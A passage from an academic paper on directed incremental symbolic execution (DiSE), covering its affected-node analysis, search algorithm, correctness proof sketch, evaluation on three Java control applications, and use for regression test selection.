diffMap is used to replace the elements in the affected sets (lines 4-9 in Fig. 5(a)). Recall that the source line differential analysis provides \(diffMap\), which maps \(unchanged\) and \(changed\) nodes in \(CFG_{base}\) to their corresponding nodes in \(CFG_{mod}\). For the nodes marked as \(removed\) in \(CFG_{base}\), the get method on \(diffMap\) returns the empty set.
The \texttt{removeNodes} algorithm in Fig. 5(a) generates all nodes affected by program instructions \(removed\) from the base version. Finally, the affected set is updated with any other \(changed\) or \(added\) nodes present in \(CFG_{mod}\), and the affected-set computation presented earlier is applied to generate the final affected sets.
Example. To illustrate how affected sets are generated, consider the example in Fig. 2. Suppose the conditional branch at line 2 has the predicate \(PedalPos = 0\) in the base program version that is modified to \(PedalPos < 0\) as shown in Fig. 2. The CFG node corresponding to line 2 in Fig. 2(a) is \(n_0\) in Fig. 2(b). The \(ACN\) set is initialized to the lone element \(n_0\) (a \(changed\) node) and the \(AWN\) set is initialized as empty. The sets are updated based on the rules in Fig. 3 as shown in Fig. 5(b).
Node \(n_2\) in Fig. 2(b) is a conditional branch statement that is control dependent on \(n_0\), causing \(n_2\) to be added to \(ACN\). The write statements at nodes \(n_1\), \(n_3\), and \(n_4\) are added to \(AWN\) since they are control dependent on nodes \(n_0\) or \(n_2\). Nodes \(n_{10}\) and \(n_{12}\) are added to \(ACN\) since they use the variable \(PedalCmd\) that is defined at nodes \(n_1\), \(n_3\), and \(n_4\) contained in \(AWN\). The write statement at node \(n_{11}\) is control dependent on \(n_{10}\), while the write statements at nodes \(n_{13}\) and \(n_{14}\) are control dependent on \(n_{12}\); hence nodes \(n_{11}, n_{13},\) and \(n_{14}\) are added to \(AWN\). Finally, when the sets \(ACN\) and \(AWN\) reach a fixed-point after applying the rules in Fig. 3, the rule in Eq. (4) in Fig. 4 is applied; it adds the write statement at node \(n_5\), whose defined variable is used at nodes \(n_{13}\) and \(n_{14}\).
The affected sets are used to direct the symbolic execution in the next phase of DiSE.
3.3 Directed Symbolic Execution
The directed symbolic execution technique explores the feasible paths that contain the sequences of affected nodes generated in the static analysis. The analysis generates path conditions that contain constraints related to the modifications in the program. All feasible path conditions related to the affected nodes are generated during the analysis. Each path condition contains a feasible instance of the conditions generated from the unchanged parts of the code. As a result, the directed symbolic execution process generates fully formed path conditions, while avoiding the generation of many path conditions arising from sequences of unaffected nodes in the program. This enables directed symbolic execution not only to explore all branches in the symbolic execution tree influenced by the affected nodes but also to prune the paths related to the unaffected parts of the code.
The algorithm for directed symbolic execution is shown in Fig. 6. The inputs to the algorithm are the affected sets $ACN$ and $AWN$, and a user-specified depth $bound$ for the symbolic execution. The DiSE procedure is invoked with the initial symbolic state of the program. Recall that the symbolic state contains a current program location, a symbolic representation of the variables, and a path condition. There are four global sets initialized on lines 3 and 4 in Fig. 6. The sets $ExCond$ and $ExWrite$ track which of the affected nodes have been “explored” during symbolic execution while the sets $UnExCond$ and $UnExWrite$ track those nodes that are “unexplored” and still need to be explored. Hence, $ExCond$ and $ExWrite$ are initialized as empty whereas $UnExCond$ and $UnExWrite$ are initialized to the $ACN$ and $AWN$ sets respectively.
The DiSE procedure in Fig. 6 provides the basic search strategy. At line 5, if the current state is at a depth greater than the user-specified depth bound or the state is an error, then the search returns to explore an alternate path; otherwise exploration continues along the same path. The getCFGNode method on line 6 takes as input the symbolic state, $s$, and returns the corresponding CFG node, $n$. Note that the current program location of the symbolic state is used to map a symbolic state to its CFG node. The procedure $UpdateExploredSet$ is invoked with CFG node $n$. For each successor state of $s$ for which the procedure $AffectedLocIsReachable$ returns true, the DiSE procedure is invoked with the corresponding successor state, exploring the relevant states in a depth-first manner.
The procedure $UpdateExploredSet$ checks whether the input node $n$ is contained in one of the unexplored sets ($UnExWrite$ or $UnExCond$) in order to track the affected nodes explored during symbolic execution (lines 30–35). If the node $n$ is contained in the unexplored write set, $UnExWrite$, then $n$ is removed from $UnExWrite$ and added to the explored write set, $ExWrite$. Similarly, a corresponding update is performed on $UnExCond$ and $ExCond$ when $n$ is contained within $UnExCond$. The procedure $ResetUnExploredSet$, shown at lines 37–42, does the reverse: it removes the input node from the explored sets and adds it to the respective unexplored set.
The $AffectedLocIsReachable$ procedure returns true if the CFG node, $n_i$, corresponding to the input symbolic state, $s_i$, can reach a node in the set of unexplored affected nodes, indicating that exploration should continue along the path that contains $s_i$; otherwise, it returns false, indicating that the path containing $s_i$ is not influenced by the modifications to the program and should be pruned. The CheckLoops procedure is invoked at line 15 to handle generating sequences of affected nodes through loops. A temporary set $UnExplored$ is initialized with the nodes in $UnExWrite$ and $UnExCond$, while $Explored$ is initialized with nodes from $ExWrite$ and $ExCond$ at lines 16 and 17. Next, when an affected node $n_j$ in $UnExplored$ is reachable from $n_i$: first, the variable $isReachable$ is set to true, and second, the nodes in the explored sets that are reachable from $n_i$ along the execution path containing $n_i$ are moved back to the unexplored sets (by invoking the $ResetUnExploredSet$ procedure). Resetting the unexplored sets enables directed symbolic execution to explore all sequences of affected nodes that lie along feasible execution paths.
The CheckLoops procedure allows DiSE to explore sequences of affected nodes that are contained within loops. If the input node $n$ to CheckLoops is the entry node to a loop (line 26), then all the nodes that are part of the loop (the strongly connected component containing $n$, GetSCC($n$)) that have been previously explored are moved back to the unexplored sets by invoking $ResetUnExploredSet$. A strongly connected component is a set of nodes where each node can be reached from all of the other nodes; here each such component has a single entry and a single exit point.
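The pruning performed by $AffectedLocIsReachable$ can be sketched on a toy CFG. This simplified Python version uses invented node names, keeps per-path rather than global bookkeeping, and omits the $ResetUnExploredSet$/CheckLoops machinery needed for multiple affected sequences and loops; it continues along a successor only if an unexplored affected node remains reachable or the path has already covered one:

```python
# Toy CFG: "s" branches to "a" (affected) or "b" (unaffected); both rejoin at "t".
edges = {"s": ["a", "b"], "a": ["t"], "b": ["t"], "t": ["end"], "end": []}
affected = {"a"}  # the lone affected node in this toy example

def reachable_from(n):
    seen, stack = {n}, [n]
    while stack:
        m = stack.pop()
        for s in edges[m]:
            if s not in seen:
                seen.add(s)
                stack.append(s)
    return seen

def dise_dfs(n, path, unexplored, paths):
    unexplored = unexplored - {n}       # UpdateExploredSet, simplified
    if n == "end":
        paths.append(path)
        return
    for s in edges[n]:
        # AffectedLocIsReachable, simplified: prune unless an unexplored
        # affected node is still reachable or the path already covered one.
        if unexplored & reachable_from(s) or affected & set(path + [s]):
            dise_dfs(s, path + [s], unexplored, paths)

paths = []
dise_dfs("s", ["s"], set(affected), paths)
print(paths)  # only the path through the affected node "a" is explored
```

At node "s" the successor "b" is pruned: no unexplored affected node is reachable from it, so the search explores one path instead of two, which is the source of DiSE's savings over full symbolic execution.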
Example. In Table 1 we show part of the directed symbolic execution performed for the example in Fig. 2. For brevity, we refer to
Table 1. Part of the directed symbolic execution performed on the example in Fig. 2.
<table>
<thead>
<tr>
<th>Line: CFG node sequence for symbolic states</th>
<th>ExWrite</th>
<th>ExCond</th>
<th>UnExWrite</th>
<th>UnExCond</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>2 (n0)</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>3 (n0, n1)</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>4 (n0, n1, n5)</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>5 (n0, n1, n5, n6, n7, n10)</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>6 (n0, n1, n5, n6, n7, n10, n11)</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>7 (n0, n1, n5, n6, n7, n10, n12)</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>8 (n0, n1, n5, n6, n7, n10, n12, n13)</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>9 (n0, n1, n5, n6, n7, n10, n12, n13, n14)</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>10 (n0, n1, n5, n6, n8 (no path))</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>11 (n0, n2)</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
CFG nodes corresponding to symbolic states when describing the execution and sequence of states. For example, the second column in Table 1 shows a sequence of CFG nodes corresponding to the sequence of symbolic states generated during symbolic execution. The ExWrite and ExCond sets are initialized to the empty set, while UnExWrite and UnExCond are initialized to the respective affected sets. At n0, an affected conditional node is moved from UnExCond to ExCond at line 2 in Table 1; similar updates occur at lines 3, 4, 5, and 7. At lines 4 and 5 in Table 1, execution continues along the successor states since a node in an unexplored set is reachable from the last node in the sequence. For example, at line 4, node n10 in UnExCond is reachable from n5, the last node in the sequence ⟨n0, n1, n5⟩. There is no path to any nodes in the unexplored sets at line 10 in Table 1 from n8.
In Table 1, at line 11, nodes are moved from the explored to the unexplored sets. The explored conditional branches n10 and n12 are reachable from node n2, and the explored write instructions n5, n11, n13, and n14 are also reachable from n2, as seen in Fig. 2(b); as node n2 is added to the explored set, nodes n5, n10, n11, n12, n13, and n14 are added back to the unexplored sets in order for DiSE to explore different sequences of affected nodes and generate corresponding feasible execution paths (if possible).
Theorem 3.10. For any sequence of affected nodes that lie on some feasible execution path within the specified depth bound, DiSE explores one execution path containing that sequence of nodes.
Proof Sketch. By contradiction. There are two cases to consider: I) There exists a feasible path (within the specified depth bound) that contains a sequence of affected nodes, which DiSE does not explore and II) DiSE explores more than one feasible execution path for some sequence of affected nodes (within the specified depth bound).
Case I. Let $q := \langle n_1, \ldots, n_k \rangle$ be a sequence of affected nodes that is contained in a feasible execution path but is not explored by DiSE. By construction, DiSE must explore $n_1$, since it is an affected node that is added to UnExWrite or UnExCond during initialization. Let $n_i$ be the first node in $q$ such that no path explored by DiSE contains the sub-sequence $\langle n_1, \ldots, n_i \rangle$; by this choice, DiSE explores a feasible path, $p$, that contains the sub-sequence $\langle n_1, \ldots, n_{i-1} \rangle$. Consider DiSE's exploration of $p$ when it processes node $n_{i-1}$. Since $n_i$ is reachable from $n_{i-1}$ and is an affected node, $n_i$ must be contained in UnExWrite or UnExCond (line 23). Hence DiSE will explore a path that contains the sub-sequence $\langle n_1, \ldots, n_i \rangle$. Contradiction.
Case II. Assume that for a sequence of affected nodes that lies on a path $p$ explored by DiSE, DiSE explores another path $p'$ containing the same sequence of affected nodes. Let $n$ be the last affected node such that $p$ and $p'$ have the exact same sub-sequence of affected and unaffected nodes up to and including $n$. Let $q := \langle n, n_1, \ldots, n_k, m \rangle$ be the sub-sequence of nodes on $p$ such that each $n_i$ is an unaffected node and $m$ is an affected node, and let $q' := \langle n, n'_1, \ldots, n'_l, m \rangle$ be the corresponding sub-sequence of nodes on $p'$. By the construction of the algorithm in Fig. 6, when DiSE considers the affected node $n$, it explores only one path to the next affected node, $m$, and prunes the others by maintaining the explored and unexplored sets in $UpdateExploredSet$ and $ResetUnExploredSet$. Hence, $q$ and $q'$ are identical. Contradiction.
4. Evaluation
In this section we evaluate the effectiveness of DiSE at generating affected path conditions relative to the path conditions generated by full symbolic execution of the changed methods in evolving software. To perform our evaluation, we implemented DiSE and performed a case-study on three Java applications, comparing the results of DiSE with full, traditional symbolic execution of the changed versions of the method. We begin this section with a description of our implementation of DiSE.
4.1 Tool Support
We implemented DiSE in Symbolic PathFinder (SPF) [26, 28], a symbolic execution extension to the Java PathFinder model checker—a Java bytecode analysis framework [36]. SPF is an open source execution engine that symbolically executes Java bytecode. SPF supports a variety of constraint solvers/decision procedures for solving path conditions; in this work we use the Choco constraint solver [6]. In general, state matching is undecidable when states represent path conditions on unbounded input data. Hence, SPF does not perform any state matching and explores the symbolic execution tree using a stateless search. Furthermore, if the solver is unable to determine the satisfiability of the path condition within a certain time bound, SPF treats the path condition as unsatisfiable. While this situation does not occur for any of the artifacts in our study, this limitation of constraint solvers could affect DiSE, causing it to miss generating affected path conditions in the modified program. Loops and recursion can be bounded by placing a depth limit on the search depth in SPF or by limiting the number of constraints encoded for any given path; SPF indicates when one of these bounds has been reached during symbolic execution. There are no loops or recursive calls in the artifacts used in our empirical study, hence, we do not specify a depth bound.
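For reference, a minimal SPF configuration for symbolically executing a single method looks roughly as follows. The class name, classpath, and parameter list are placeholders, and exact keys can differ across SPF versions; this is a sketch, not the configuration used in the study:

```
# Hypothetical .jpf configuration (names and paths are placeholders)
target = WBS
classpath = ${jpf-symbc}/build/examples
# mark the three parameters of update(...) as symbolic
symbolic.method = WBS.update(sym#sym#sym)
# constraint solver used in this study
symbolic.dp = choco
listener = gov.nasa.jpf.symbc.SymbolicListener
```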
DiSE extends SPF by implementing custom data and control dependency analyses that compute a conservative approximation of the affected locations for a changed method. DiSE performs these analyses when the modified method is invoked during symbolic execution, and then uses the information about the affected locations to direct symbolic execution within SPF.
4.2 Case-Study
The goal of our technique is to direct symbolic execution on a modified program version to explore only program conditions that are affected by the changes to the source code. We evaluate the cost and effectiveness of DiSE relative to full symbolic execution on the changed methods by considering the following research questions:
RQ1: How does the cost of applying DiSE compare to full symbolic execution on the changed method?
RQ2: How does the number of affected path conditions generated by DiSE compare with the number of path conditions generated by full symbolic execution?
4.2.1 Artifacts
To evaluate DiSE we compared method versions from three Java artifacts. The first program, the Wheel Brake System (WBS), is a synchronous reactive component from the automotive domain. The Java model is based on a Simulink model derived from the WBS case example found in ARP 4761 [17, 30]. We use the update(int PedalPos, boolean AutoBrake, boolean Skid) method in WBS to evaluate DiSE. This method determines how much braking pressure to apply based on the environment. The Simulink model was translated to C using tools developed at Rockwell Collins and manually translated to Java. It consists of one class and 231 source lines of code.
Our second artifact is a version of the Java program used to model NASA’s On-board Abort Executive (OAE). The OAE models the Crew Exploration Vehicle’s prototype ascent abort handling software, receiving its inputs from sensors and other software components. The inputs are analyzed to determine the status of the ascent flight rules and to evaluate which ascent abort modes are feasible. Once a flight rule is broken and an abort mode is selected, it is relayed to the rest of the system for initiation. The version of OAE evaluated for this work consists of five classes. The method under analysis consists of approximately 150 source lines of code.
The third artifact we used to evaluate DiSE is the Altitude Switch (ASW) application. This program is a synchronous reactive component from the avionics domain. It turns power on to a Device Of Interest (DOI) when the aircraft descends below a threshold altitude above ground level (AGL). It was developed as a Simulink model, and was automatically translated to Java using tools developed at Vanderbilt University [34].
To evaluate DiSE in an empirical study we required multiple versions of each method being analyzed. Because multiple versions of these artifacts were not available, we generated versions by manually creating mutants of the base version (v0) of the method under analysis. When creating mutants, we considered a broad range of changes that can be applied to the code: the change location, the change type, and the number of changes. We introduced changes at the beginning, middle, and end of each method. We also considered the control structures in the code, and made changes at various depths in nested control structures. Each mutant has one, two, or three changed Java statements, resulting in up to nine changed nodes in the CFG for the changed version of a method, as shown in Table 2.
In the WBS example, versions 1–6 contain a single changed Java source statement, versions 7–11 contain two changed statements, and versions 12–16 contain three changed statements. For the ASW example, we made a single change to versions 1–11, and two changes to versions 12–15. For the OAE example, a single change was made to versions 1–6, two changes were made to versions 7 and 8, and version 9 contains three changed Java source statements. The versions that contain multiple changes were created by combining the individual mutations made to versions with a single change. For example, version 12 of the WBS example contains the same individual changes as versions 1, 4, and 5. Each change involved the addition, removal, or modification of a statement. Control statements were modified by mutating the comparison operator, e.g., from < to <=, or the operand, e.g., mutating the program variables involved in the comparison. Non-control statements were modified by changing the value assigned to a program variable.
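The comparison-operator mutation described above can be illustrated with a short AST transformation. The snippet below is in Python (using its ast module) purely for illustration; the study itself mutated Java sources, and the expression is a stand-in for a guard like the one at line 2 of Fig. 2:

```python
import ast

class RelOpMutator(ast.NodeTransformer):
    """Mutate the first '<' comparison into '<=' (one mutation per mutant)."""
    def __init__(self):
        self.done = False

    def visit_Compare(self, node):
        self.generic_visit(node)
        if not self.done and isinstance(node.ops[0], ast.Lt):
            node.ops[0] = ast.LtE()  # < becomes <=
            self.done = True
        return node

base = "PedalPos < 0"
tree = ast.parse(base, mode="eval")
mutant = ast.unparse(RelOpMutator().visit(tree))
print(mutant)  # PedalPos <= 0
```

Limiting the transformer to one mutation per pass mirrors the single-change versions; combining passes yields the multi-change versions.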
4.2.2 Variables and Measures
The independent variable in our study is the symbolic execution algorithm used in our empirical study. We use the DiSE algorithm, and as a control, we use full (traditional) symbolic execution as implemented in the SPF framework. For our study, we selected three dependent variables and measures: 1) time, 2) states explored, and 3) number of path conditions generated. Time is measured as the total elapsed time reported by SPF. It includes the time spent computing the affected program locations and the time spent performing symbolic execution. States explored provides a count of the number of symbolic states generated during symbolic execution. Number of path conditions generated provides a count of the number of program execution paths generated by a given technique. Time and states explored are used to relate the cost of DiSE to the cost of full symbolic execution of the changed method (RQ1), while number of path conditions generated is used to judge the effectiveness of DiSE relative to full symbolic execution (RQ2).
4.2.3 Experiment Setup
To perform our study, we compiled all of our artifacts using Java version 1.6.0_22. We used a custom Java application to perform a lightweight diff analysis comparing the abstract syntax tree (AST) for each mutant with the AST for the base version of the program. We then analyzed each mutant version with DiSE, using the results of the AST diff. We also performed symbolic execution on each mutant using standard symbolic execution in SPF (JPF v6). The study was performed on a MacBook Pro running at 2.26 GHz with 2 GB of memory and running Mac OS X version 10.5.8.
4.2.4 Threats to Validity
The primary threats to external validity for our study are (1) the use of SPF within which we implemented our technique, (2) the use of Choco as the underlying constraint solver, (3) the selection of artifacts used to evaluate DiSE, and (4) the changes applied to create the mutants. Implementing DiSE in another framework or using another constraint solver/decision procedure could produce different results; however, replicated studies with other tool frameworks would address this threat. The artifacts selected for our study are control applications that are amenable to symbolic execution. The artifacts are comparable in structure and complexity to other artifacts that we are aware of that are used to evaluate symbolic execution techniques. The mutant versions we used to perform our study were created manually, and may or may not reflect actual program changes; however, the mutations were developed in a systematic way that considered program location, change type, and number of changes. Further evaluation of DiSE on a broader range of program types and on programs with actual version histories would address this threat.
The primary threats to internal validity are the potential faults in the implementation of our algorithms and in SPF. We controlled for this threat by testing our algorithms on examples that we can manually verify. With respect to threats to construct validity, the metrics we selected to evaluate the cost of DiSE are commonly used to measure the cost of symbolic execution.
4.2.5 Results and Analysis
In this section, we present the results of our case-study and analyze them with respect to our two research questions. In Tables 2(a)–(c) we list the results of running DiSE and full symbolic execution on each version of each Java artifact. For each mutant version of the method, we list the number of CFG nodes changed (Changed), the number of CFG nodes affected by the changes (Affected), and the metrics described in Section 4.2.2: the time to perform DiSE and the time to perform traditional symbolic execution of the mutant version as reported by SPF, the number of states explored during execution of each technique, and the number of path conditions generated by each technique in the resulting method summary. The results for DiSE are listed under the subheading DiSE and the results for traditional symbolic execution are listed under the subheading Full Symbolic.
Table 2. DiSE and Symbolic Execution Results. [Table values were garbled in extraction and are omitted. For each mutant version, the table reports the number of changed and affected CFG nodes and, for both DiSE and full symbolic execution, the time taken, the number of states explored, and the number of path conditions generated.]
**RQ1 (Cost).** In Tables 4.2.1(a)–(c), we can see that for all versions of the ASW and OAE examples, and for the majority of versions in the WBS example, DiSE takes considerably less time than full symbolic execution. In many cases, the difference in time is several orders of magnitude. For all of the examples, when the changes to the program do not affect all path conditions (program paths), DiSE takes at most 20% of the time taken by full symbolic execution. For the five versions of the WBS example (v1, v7, v10, v14, and v15) where DiSE explores the same number of states as full symbolic execution, the time taken by DiSE is 9%–30% longer than full symbolic execution. This extra execution time accounts for the overhead of computing the affected locations and supporting data structures.
For all of our examples, there is considerable variation in the number of states explored by DiSE; our intuition is that other factors beyond the number of changes, e.g., location and nature
of the change, also have a considerable effect on the reductions that can be achieved by DiSE (or any other technique that can characterize the effects of program changes). We also conjecture that program structure, particularly with regard to the number and complexity of the constraints generated during symbolic execution contributes to the differences in execution time for each technique.
**RQ2 (Effectiveness).** The number of path conditions computed by DiSE varies greatly between versions for all three examples, as shown in Tables 4.2.1(a)–(c). For the 15 versions analyzed in the ASW example, DiSE computes between zero and three path conditions for 13 versions. For the other two versions, DiSE computes approximately 22% of the path conditions generated by full symbolic execution (381 and 383 path conditions). In v1 of the ASW example, no CFG nodes are changed because a compiler optimization effectively masks the change; for the remaining versions where no path conditions are generated, one or more CFG nodes were affected, but the changes do not affect the path conditions generated by DiSE.
While none of the changes require DiSE to explore all paths in the ASW or OAE examples, in five of the 16 versions of the WBS example, DiSE generates the same number of path conditions as full symbolic execution. For these five versions, the number of changed CFG nodes ranges from one to three (out of 100 CFG nodes), and the number of affected CFG nodes ranges from 39 to 42. On the other hand, in v12 of the WBS example where only six path conditions are generated by DiSE (compared with 24 by full symbolic execution), eight CFG nodes are changed and 65 nodes are affected. In the OAE example, the change made to v6 affects seven CFG nodes (10%) and generates 26,164 path conditions – 20% of the path conditions computed by full symbolic execution. In v7, the changes affect 43 CFG nodes (62%) and yet the same number of path conditions is generated. Based on our analysis of the mutants created for these examples, there does not appear to be any correlation between the number or percentage of affected nodes and the number of affected path conditions.
Overall, our study demonstrates that for the examples used in this study, DiSE has potential application for detecting and characterizing affected program behaviors in evolving software. In the artifacts used in our evaluation, DiSE was able to correctly identify and characterize the subset of path conditions computed by full symbolic execution as affected. In some instances, the change affected only a small percentage of path conditions, and in others, the change(s) had a much greater impact. When only a subset of the path conditions were affected by the changes, DiSE was able to consistently compute the affected path conditions in less time – often several orders of magnitude – than full symbolic execution; when all of the path conditions were affected by the changes, the overhead incurred by DiSE was between 9% and 30% for these examples.
# 5. Discussion
The goal of DiSE is to enable more efficient symbolic execution by focusing it on generating affected path conditions. DiSE uses a conservative analysis to identify affected program locations. Thus, in principle, DiSE may generate some path conditions that represent unchanged paths. However, as experimental results demonstrate, DiSE is effective at focusing symbolic execution on affected program behaviors and enables efficient incremental symbolic execution.
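The conservative impact analysis described above can be pictured as a worklist fixpoint: starting from the changed CFG nodes, any node that depends on an already-affected node is itself marked affected, until nothing new is added. The sketch below is illustrative only — the node ids and the dependence map are invented, and DiSE's actual implementation operates on Java bytecode CFGs inside SPF.

```java
import java.util.*;

// Hypothetical sketch of a conservative impact analysis. Starting from the
// changed CFG nodes, repeatedly mark every node that depends (via control or
// data dependence) on an already-affected node, until a fixed point is
// reached. Node ids and the dependence map are invented for illustration.
public class ImpactAnalysis {
    // dependents maps a node to the set of nodes that depend on it.
    public static Set<Integer> affectedNodes(Set<Integer> changed,
                                             Map<Integer, Set<Integer>> dependents) {
        Set<Integer> affected = new HashSet<>(changed);
        Deque<Integer> worklist = new ArrayDeque<>(changed);
        while (!worklist.isEmpty()) {
            int node = worklist.pop();
            for (int dep : dependents.getOrDefault(node, Collections.emptySet())) {
                if (affected.add(dep)) {  // newly affected: propagate further
                    worklist.push(dep);
                }
            }
        }
        return affected;
    }
}
```

Because the propagation is transitive, the result over-approximates the truly affected locations, which is exactly why DiSE may generate some path conditions that represent unchanged paths.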
## 5.1 Bug finding using DiSE
DiSE can handle programs with assertions when the “assert” statements are de-sugared into “if” and “throw” statements. In Java programs, this de-sugaring takes place when assert statements in Java source are compiled into Java bytecode. Since DiSE performs symbolic execution on Java bytecode, it will not miss an assertion violation caused by a program change. Thus, DiSE supports finding bugs when assertions are present and assertion failures characterize bugs. If the assertions were written in a language other than the underlying programming language (e.g., Alloy [16] assertions in Java programs), our technique would work with the assertions translated to Java (e.g., from Alloy).
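The de-sugaring can be seen in a small source-level example. The `Account` class below is invented for illustration; note that javac additionally guards the check with a generated `$assertionsDisabled` flag, which this sketch omits (i.e., assertions are treated as always enabled).

```java
// Illustrative de-sugaring of a Java assert statement into "if"/"throw",
// which is the form a bytecode-level analysis such as DiSE observes.
public class Account {
    private int balance = 0;

    public void deposit(int amount) {
        balance += amount;
    }

    public void withdraw(int amount) {
        balance -= amount;
        // Original source form:
        //     assert balance >= 0 : "negative balance";
        // De-sugared form, as the compiled bytecode behaves:
        if (balance < 0) {
            throw new AssertionError("negative balance");
        }
    }

    public int balance() {
        return balance;
    }
}
```

Because the assertion is now an ordinary branch, a change that makes the `balance < 0` branch reachable shows up as an affected path condition like any other.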
## 5.2 Software evolution
The results of DiSE can be used to support various software evolution tasks. We present one such application—regression testing as it relates to test case selection and augmentation. We note that our goal is not to demonstrate the effectiveness of test case selection and augmentation, but, rather to demonstrate one application of DiSE results to support software evolution tasks.
SPF outputs values that can be used for the method arguments (test inputs) based on the generated path conditions. The test inputs are produced by solving the constraints in the path condition and using the resulting values to generate a call to the method under analysis. The results are output in string format. Our implementation of test case selection and augmentation is trivial in its approach – it simply performs a string comparison of the test cases generated for the original version (by full symbolic execution) with the tests generated by DiSE. Tests generated for the original version of the method represent an existing test suite. Tests generated by DiSE that are also found in the tests generated for the original version are marked as selected, while the other tests are considered tests to be added to augment the test suite.
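The string-comparison approach above amounts to partitioning the DiSE-generated tests into those already present in the original suite (selected for re-use) and those that must be added to cover affected behaviors. A minimal sketch, with invented test strings standing in for the method calls SPF prints:

```java
import java.util.*;

// Sketch of test case selection/augmentation by string comparison:
// DiSE-generated tests found in the original suite are "selected";
// the remainder are "added" to augment the suite.
public class TestSelection {
    public static Map<String, List<String>> partition(List<String> originalTests,
                                                      List<String> diseTests) {
        Set<String> existing = new HashSet<>(originalTests);
        List<String> selected = new ArrayList<>();
        List<String> added = new ArrayList<>();
        for (String test : diseTests) {
            if (existing.contains(test)) {
                selected.add(test);   // re-usable existing test case
            } else {
                added.add(test);      // new test needed for an affected behavior
            }
        }
        Map<String, List<String>> result = new HashMap<>();
        result.put("selected", selected);
        result.put("added", added);
        return result;
    }
}
```

A plain string comparison is deliberately simple: it is sound only to the extent that SPF prints identical inputs identically across runs, which suffices for the demonstration here.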
The results of using DiSE to perform test case selection and test case augmentation for our three examples are shown in Tables 3(a)–(c). The combination of selected and added tests execute all of the branches in the program that are in some way affected by the changes made to the method under analysis. Full symbolic execution on the original version of ASW generates 256 tests, while full symbolic execution on the WBS and OAE examples generates 24 tests and 2,920 tests respectively. Note that the number of test cases generated by symbolic execution and by DiSE differs from the number of path conditions generated by each technique; this is due to the fact that the current implementation of the test generation tool computes input values only for the method arguments, i.e., a partial state. As a result, when fields are represented by symbolic values, multiple path conditions generated by a given technique may map to a single set of concrete inputs to the method under analysis.
For all of the artifacts in our study, the results of DiSE can be used to identify the test cases that can be re-used, and the test cases that exercise affected path conditions for which new test cases must be generated. For the ASW and WBS examples, DiSE results show that only a small number of test cases is necessary to augment the test suite for the new version of the program. For the OAE example, the results of DiSE indicate that for some changes, e.g., v3, it is unnecessary to generate any new test cases. For versions v6 and v8, however, only two of the existing test cases are valid for the new version of the program and 584 test cases are necessary to test the program behaviors identified as affected by DiSE. When only a subset of the path conditions is affected by the changes to a program, using DiSE results for test case selection and augmentation of the artifacts in our study would result in executing between 20% and 70% of the test cases that would be run in a re-test-all approach, reducing the time necessary for regression testing of the new version of the program.
The requirements for soundness and completeness of an analysis are driven by the needs of the specific evolution task that uses the results of the analysis. For example, the test selection and augmentation application considered here covers all the branches in the method that are affected by the change. However, it does not necessarily provide full (bounded) path coverage. To achieve full path coverage, additional information could potentially be recorded from a previous run, and combined with DiSE results. As future work, we plan to investigate the use of DiSE for other software evolution tasks.
# 6. Related Work
Recent years have seen significant growth in research projects based on symbolic execution, first introduced in the 1970s by Clarke [7] and King [22]. These projects have pursued three primary research directions to enhance traditional symbolic execution: (1) improving its effectiveness [4, 10, 12, 19, 32]; (2) improving its efficiency [1, 3, 5, 11, 20, 31, 37]; and (3) improving its applicability [8, 18, 27, 33]. The novelty of DiSE lies in applying a static analysis in synergy with state-of-the-art symbolic execution techniques, enabling symbolic execution to perform more efficiently as a program undergoes changes.
Projects to enhance the effectiveness of symbolic execution have focused on two areas. The first is to enable symbolic execution to handle programs written in commonly used languages, such as Java and C/C++, by providing support for symbolic execution over the core types used in these languages [4, 10, 12, 19, 32]. The second is to work around the traditional limitation of undecidable path conditions through the use of mixed symbolic/concrete execution, which attempts to prevent the path conditions from becoming too complex [12, 32].
Research to enhance the efficiency of symbolic execution has followed three basic directions: first, using abstraction with symbolic execution to reduce the space of exploration [1, 20]; second, performing compositional symbolic execution, where summaries of parts of the code are used in place of an actual implementation to enable the underlying constraint solvers to perform more efficiently [3, 11]; and third, enabling symbolic execution to find bugs faster through the use of heuristics, e.g., genetic algorithms [37], that directly control the symbolic exploration and focus it on parts of the program that are more likely to contain bugs.
Static analysis has also been used effectively for guiding symbolic execution. Chang’s recent doctoral dissertation [5] uses a def-use analysis based on user-provided control points of interest, and applies a program transformation that incorporates boundary conditions on program inputs into the program logic to enable more efficient bug finding. Santelices and Harrold [31] use control and data dependencies to symbolically execute groups of paths, rather than individual paths to enable scalability. The key difference between DiSE and previous work is the ability of DiSE to utilize information about program differences for efficient symbolic execution as code undergoes changes.
While several projects have made significant advances in applying symbolic execution to test input generation and program verification – two traditional applications of symbolic execution – recent projects have used it as an enabling technology for various novel applications, including program differencing [27], data structure repair [18], dynamic discovery of invariants [8], as well as estimation of energy consumption on hardware devices with limited battery capacity [33].
An application of symbolic execution with a focus on program differences is regression testing [14, 15, 25]. Several recent projects use symbolic execution as a basis of test case selection and augmentation [29, 35, 38]. DiSE differs from these projects in its focus on the core symbolic execution technique to enable a variety of software evolution tasks – not only regression testing.
Program differencing, in general, is a well-studied research area with several techniques for computing differences [2, 21, 27] as well as leveraging them to enable various software evolution tasks [23]. Research in utilizing differences to speed-up symbolic execution by focusing it on code changes has only recently begun. Godefroid et al. [13] consider the problem of statically validating symbolic test summaries against changes, specifically for compositional dynamic test generation. Our approach is complementary since it uses change impact information to explore only the paths of the symbolic execution tree that are affected by the change, thereby reducing the cost of recomputing symbolic summaries.
